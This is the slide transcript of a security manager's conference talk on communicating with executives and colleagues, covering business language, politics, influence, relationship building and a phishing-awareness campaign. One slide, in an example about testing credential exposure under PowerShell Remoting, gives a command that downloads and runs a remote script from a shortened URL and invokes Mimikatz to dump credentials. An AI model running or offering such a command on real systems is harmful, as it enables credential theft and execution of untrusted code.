Communication hack fest-2018-final
2 likes279 views
The document discusses the challenges and importance of communication and influence within a security management context. It emphasizes the need for security professionals to speak the language of business, build relationships, and utilize soft skills to effectively convey security issues and gain support from stakeholders. The presenter shares personal experiences and strategies for improving communication and fostering collaboration across teams.
![@haydnjohnson
Credentials in Memory
Thumbs up success gift] / image](https://image.slidesharecdn.com/communication-hackfest-2018-final-181102193543/85/Communication-hack-fest-2018-final-92-320.jpg)
Communication hack fest-2018-final
- 1. @haydnjohnson Communication to Upper Management & Colleauges The Art of Influence
- 2. @haydnjohnson Whoami Haydn Johnson Security Manager| Purple Teamer Points (points.com) @haydnjohnson Talks: Bsides, Circle City Con, SecTor, NolaCon Kitty, Gym, BJJ http://www.slideshare.net/HaydnJohnson
- 5. @haydnjohnson 1. Outline give a summary of (something).
- 6. @haydnjohnson Outline ❏ Why this talk ❏ Communication Problem ❏ Politics ❏ Influence ❏ Relationship Building ❏ Examples
- 7. @haydnjohnson 2. How|Why This Talk Some background
- 8. @haydnjohnson A long time ago Pentesting | Big 4 consulting
- 9. @haydnjohnson Consulting vs Internal 1 2 3 4 ????? 4 weeks Forever
- 10. @haydnjohnson What I do Job Title: Security Manager Responsibilities: Everything Security Threat Intelligence Network Security Security Program SDLC Logging & Monitoring Employee Security Awareness Web Security Questions …...
- 11. @haydnjohnson What I do Number of direct reports : 0 ME
- 12. @haydnjohnson Number of Security staff
- 13. @haydnjohnson In Reality OPs Team Windows Team DBA Team Sysadmins
- 14. @haydnjohnson I had to gain support from teams that had no obligation to help. ❏ No goals ❏ Security responsibility only in my Job Description In Short
- 15. @haydnjohnson
- 17. @haydnjohnson Some Struggles I’m not a silver bullet ❏ I don’t know everything ❏ Busy ❏ Not Seen as authority figure - initially ❏ Dev experience lacking
- 18. @haydnjohnson Struggles I'm not as technical as I thought ❏ Developers asking about websockets / encryption “Let me do some investigation and get back to you ” / Aka let me Google that Was not sure where to start ❏ I wanted to do everything ❏ So many goals ❏ Taking on too much
- 20. @haydnjohnson Which is preferred ❏ Says hello every morning ❏ Asks how you are ❏ Remembers personal information ❏ Ensures you understand tasks ❏ Rushes straight to their desk ❏ Does not ask questions ❏ Micromanges ❏ Flips you email of list Can you work late tonight?
- 21. @haydnjohnson Security has a Communication Problem ❏ Management does not care ❏ I told them X months ago but didn’t listen ❏ Pentest was short ❏ It just does not work that way ❏ What is the boss thinking ❏ Thats not a pentest I still struggle with these
- 23. @haydnjohnson Security has a Communication Problem Pop Calc Example
- 24. @haydnjohnson Kind of correct! This is what an exec thinks Security has a Communication Problem
- 25. @haydnjohnson Not paid Not Fixed Sad Pandas Consequences Security has a Communication Problem
- 26. @haydnjohnson Security has a Communication Problem Leads to: Not Aligned Frustration Running around
- 27. @haydnjohnson Kind of correct! This is what an exec thinks Security has a Communication Problem
- 28. @haydnjohnson What was not explained: ❏ Popping calcutor is an EXAMPLE of controlling code So what? ❏ Someone can control that computer So what? ❏ Someone is in your network ❏ Access to Data So what? Security has a Communication Problem
- 29. @haydnjohnson What could be improved?
- 30. @haydnjohnson Speak their language ❏ How does this impact them? ❏ Money ❏ Reputation ❏ Down time ❏ Fines ❏ Loss of customers Benefits ❏ Executives understand ❏ Fixing happens ❏ Less frustration for all Security has a Communication Problem
- 31. @haydnjohnson 4. Why is there a Communication Problem? What’s a business
- 33. @haydnjohnson
- 34. @haydnjohnson
- 35. @haydnjohnson
- 41. @haydnjohnson Business Context Security Costs Time & Effort
- 42. @haydnjohnson Business Context It Won ‘t Happen to Us
- 44. @haydnjohnson So what can we do?
- 45. @haydnjohnson Breaking the Status Quo Security is seen as a Cost Need to show how much a compromise would cost Security is time and effort we don’t want Amount of dollars to protect $company Legislation Reputation Won’t happen to us Statistics News headlines Assume Breach
- 46. @haydnjohnson If Secuirty is seen in negative ways How do we fix this?
- 47. @haydnjohnson How do we have an impact? Politics Influence
- 50. @haydnjohnson “Your Organization is MUCH more political than most of us realize. https://www.manager-tools.com/2012/12/rules-politics-chapter-one -count-your-votes
- 52. @haydnjohnson Politics Think of it as Relationship Effects “Professional Life is HUMAN life, and that means it's emotional, and therefore political.” https://www.manager-tools.com/2012/12/rules-politics-chapter-one -count-your-votes
- 53. @haydnjohnson Politics Think of it as Relationship Effects ❏ In order to get what I want, I have to give them what they want ❏ Give and take
- 54. @haydnjohnson How can you ‘play’ politics better?
- 55. @haydnjohnson 3. Influence A process for having an effect
- 56. @haydnjohnson If someone influences someone else, they are changing a person or thing in an indirect but important way. This way What is Influence
- 58. @haydnjohnson Why Influence ❏ Reach Goals ❏ Effect change ❏ Having input that matters ❏ Being appreciated ❏ Necessary tool in organizational life
- 59. @haydnjohnson Why Influence What could that mean for me: ❏ The extra tool you needed ❏ Career development ❏ Bigger project ❏ Exploitation ❏ Fixes approved ❏ Help from other teams ❏ Time to tune tools ❏ Changing a process
- 60. @haydnjohnson Why Influence Most importantly You are not doing this:
- 61. @haydnjohnson How to Influence ❏ Speak Business Language ❏ Communicate in Risk, Dollars and cents ❏ Relationship Building
- 62. @haydnjohnson How to Influence Business Language ❏ Business Reputation ❏ Customer / Client Reputation ❏ Market and Strategy ❏ How do we stack against other companies ❏ Compliance ❏ Technology is not the driving force
- 63. @haydnjohnson How to Influence Metrics ❏ High, Medium, Low ❏ How long does it take to remediate? ❏ What are they rated on?
- 64. @haydnjohnson How to Influence Risks, dollars and cents ❏ What is the risk, so what? ❏ Dollar spent for each dollar protected ❏ Best practices
- 65. @haydnjohnson How to Influence Meetings ❏ Agenda / Description ❏ Prepare beforehand ❏ Start and finsh on time
- 66. @haydnjohnson If you can't present. Your ideas cant be heard https://www.manager-tools.com/2012/12/rules-politics-chapter-one-count-your-vot es
- 68. @haydnjohnson
- 69. @haydnjohnson Technical Skills are Fantastic Your exploit code is amazing Your detection algorithm is on point
- 70. @haydnjohnson Relationship Building Tech + Soft Skills == Career zero day ❏ Networking == more opportunities What you do and know can reach more people
- 71. @haydnjohnson What does it mean? People Skills / Soft Skills ❏ Thinking outside the self ❏ Communicating clearly ❏ Empathy
- 72. @haydnjohnson What does that really mean? Influence ❏ How can I get the most out of this interaction to benefit security? ❏ How can I speak in their language? ❏ What mood are they in?
- 73. @haydnjohnson
- 74. @haydnjohnson Examples - Risk Register Risk Register ❏ Why a Risk Register? ❏ What value will it add? ❏ Speak Business
- 75. @haydnjohnson Examples - Risk Register Risk Register ❏ To track risks, accountability ❏ Potential damage / cost / impact ❏ Metrics
- 76. @haydnjohnson Examples - Risk Register How did I approach ❏ Placing in Jira I want to create this, that has a goal of... How can you help me? Is there a different way?
- 77. @haydnjohnson Examples - Risk Register The result ❏ A whole workflow created in a test environment ❏ People love to help if you look at them as the expert ❏ More than just what I wanted included ❏ Things included audibility and tracking ❏ Metrics for the business
- 78. @haydnjohnson Examples - Mistakes Admitting them ❏ Hard ❏ Necessary ❏ Cultivates a great environment
- 79. @haydnjohnson What I find works
- 80. @haydnjohnson Solutions that worked for me Relationship Building & Influence ❏ Not claiming the sky is falling ❏ Transparency ❏ Listening for a response Why does it work? ❏ No boy who cried wolf ❏ Integrity ❏ They will feel valued, more likely to help
- 81. @haydnjohnson Solutions that worked for me Coffee with the CFO Example ❏ Present to CFO/CTO fortnightly Fear usingFear ❏ Fear should not be the tool for security
- 82. @haydnjohnson Solutions that worked for me Security is not just code ❏ People ❏ Process ❏ Technology Code is written by people. Code is pushed via a process. Code is hosted on technology
- 85. @haydnjohnson Credentials in Memory Helpdesk / Ops wants a secure way to remotely manage workstation(s). RDP | VNC - no thanks Want to use PowerShell Remoting because easier and ‘secure’ https://blog.netspi.com/powershell-remoting-cheatsheet/
- 86. @haydnjohnson Credentials in Memory Requirements ❏ Ease of use ❏ Secure ❏ Auditability Research shows this is possible
- 87. @haydnjohnson Credentials in Memory Steps: ○ Before PS-Remoting ○ After PS-Remoting
- 88. @haydnjohnson Credentials in Memory ❏ Need to know for sure ❏ Want to test credentials are safe ❏ See for self Mimikatz comes in
- 89. @haydnjohnson Credentials in Memory Command Run: powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds | Out-File pre.txt” http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-pa sswords-with.html
- 90. @haydnjohnson Credentials in Memory Dumping credentials
- 92. @haydnjohnson Credentials in Memory Thumbs up success gift] / image
- 93. @haydnjohnson Credentials in Memory Success! ❏ Need to document ❏ Have justification to Implement! ❏ Security Gives sign off!
- 95. @haydnjohnson Top Takeaways We are all in this together Soft skills will take you far
- 99. @haydnjohnson Phishing Awareness Campaign Not textbook execution ❏ Was not focused on click rate or credentials ❏ Exciting - allowed rumours to spread ❏ People talked about it with each other
- 100. @haydnjohnson Phishing Awareness Campaign Goals for $company ❏ Know to contact me for $security ❏ Have security at front of mind ❏ Understand phishing scams
- 104. @haydnjohnson Everyone can be phished, even me
- 105. @haydnjohnson Phishing Awareness Campaign Training was not training ❏ 30min awareness session ❏ Lolcats & jokes ❏ Graphs for team results
- 106. @haydnjohnson Phishing Awareness Campaign Visibility as Security ❏ Everyone knew my name ❏ People approached me with their story
- 108. @haydnjohnson Top Takeaways We are all in this together Soft skills will take you far